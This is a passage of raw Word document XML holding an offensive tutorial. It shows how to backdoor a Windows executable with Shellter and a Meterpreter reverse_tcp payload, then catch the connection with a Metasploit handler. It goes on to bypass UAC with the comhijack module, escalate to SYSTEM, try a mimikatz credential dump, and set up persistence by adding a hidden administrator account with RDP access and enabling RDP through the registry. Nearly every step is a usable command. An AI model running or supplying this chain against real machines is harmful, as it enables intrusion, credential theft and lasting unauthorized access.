      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shellter will then initialize and run some checks. It will then prompt you whether to run in stealth mode. Select “Y” for yes.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5245100" cy="25019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2451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3276600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>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2451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800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter LHOST and LPORT and press Enter. Shellter will run to completion and request you to press Enter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098">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959100"/>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451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800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The screenshot below shows what commands to issue within Metasploit. First, we’ll tell Metasploit to use the generic payload handler “multi/handler” using the command use multi/handler. We will then set the payload to match the one set within the executable using the command set payload windows/meterpreter/reverse_tcp. We will then set the LHOST and LPORT this way — set LHOST 192.168.100.4 and set LPORT 4444. Once done, type “run” or “exploit” and press Enter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The screenshot below displays the output. The reverse TCP handler should begin waiting for a connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">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044700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="29"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245100" cy="2044700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bafv3a8q69u" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Executing the payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On copying the file to our target Windows machine, we have the screenshot below. Execute the file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009E">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05740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245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800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The executable causes the payload to be executed and connect back to the attacking machine (Kali Linux). Immediately, we receive a Meterpreter session on our Kali Linux. This is demonstrated by the Meterpreter &gt; prompt as shown below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A0">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171700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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2451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800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since the file was not run as “administrator,” there are Meterpreter commands that can’t be run as they would result in an “access denied” response. This can be confirmed by running the getuid command, which tells us that we are running as user l3s7r0z.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A2">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304800"/>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245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800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To prove that the user lacks enough privileges, we attempted to run the command mimikatz_command -f sekurlsa::logonPasswords.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A4">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The result is an “Access is denied” message, as shown below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5">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100330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2451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800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In order to gain sufficient rights, we need to perform a UAC bypass. In the next section, we’ll see how this can be done.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5ryb44mp66w2" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A8">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege escalation allows us to elevate privileges from our less privileged user (l3s7r0z) to a more privileged one — preferably the SYSTEM user, which has all administrative rights.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5245100" cy="584200"/>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2451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800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since the methods used by getsystem all fail, we need an alternative method of elevating privileges. We will use the comhijack exploit module to bypass User Access Control. To do so, we “background” our Meterpreter session, switch our exploit from multi/handler to windows/local/bypassuac_comhijack and implement this on the session in the background, using set SESSION 2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AA">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is shown below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AB">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901700"/>
            <wp:effectExtent b="0" l="0" r="0" t="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2451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800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We then set the payload using set payload windows/x64/meterpreter/reverse_tcp and set the LPORT and LHOST. We then run the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AD">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1790700"/>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800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We successfully receive a Meterpreter session. Typing sysinfo shows us the information of our target. getuid shows that we are running as user l3s7r0z on Windows 10, but we can elevate to SYSTEM by issuing getsystem. We can see that elevation was successful and can confirm this by issuing getuid again. We can see we are now NT AUTHORITYSYSTEM.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4938713" cy="1900194"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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938713" cy="19001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800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that we are within the target machine, why not perform some persistence to stay there?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_uxgnmeu39i2b" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B1">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Persistence allows us to gain access back to the machine whenever we need to even when the target decides to patch the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B2">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the Meterpreter session, we type the command shell to drop into a Windows shell on the Windows 10 target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B3">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997200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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2451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800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">At the C:WINDOWSsystem32&gt; prompt, we issue the net users command. This lists all the users within the windows machine. As we can see, there are only two users, the Administrator and the l3s7r0z user.</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">We add a new user Jaime and give him the password Bru73f0rc3_</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">The command used to do that is:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">net user /add jaime Bru73f0rc3_</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">We then add Jaime to the administrators group so that the account can perform admin</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">functions. The command used is:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">net localgroup administrators jaime /add</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">We then add him to the RDP group. This will allow us to log in through RDP to the target machine, even after it has been patched to have firewall and antivirus on.</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">The command used is:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">net localgroup “Remote Desktop Users” jaime /add</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">After all the setup is done for user Jaime, we can use the following command to see the user’s properties:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">net user jaime</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5245100" cy="3632200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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2451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800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To enable RDP, use the following command:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">|reg add “HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B6">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you would like to disable RDP for whatever purpose, you can do so by typing the following command:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">reg add “HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server” /v fDenyTSConnections /t REG_DWORD /d 1 /f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B7">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The result of the operation is shown below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B8">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571500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="30"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2451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800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the Kali Linux machine, we can use the remmina remote connection client. If it is not installed within Kali, you can install it by typing the following command:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">apt-get install remmina</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Start remmina by typing remmina on the command prompt. And connect to the target using its IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BA">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387600"/>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2451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800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You will be required to accept a certificate. Do so and use the username and password used to register the Jaime account. That is:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Username: jaime</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Password: Bru73f0rc3_</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BC">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, in Windows 10, the logged-in user using Windows 10 will be required to allow you to connect. However, if they do not respond within 30 seconds, they are automatically logged out.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BD">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5245100" cy="2349500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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2451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highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BF">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pP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5.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.shellterprojec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4.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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27.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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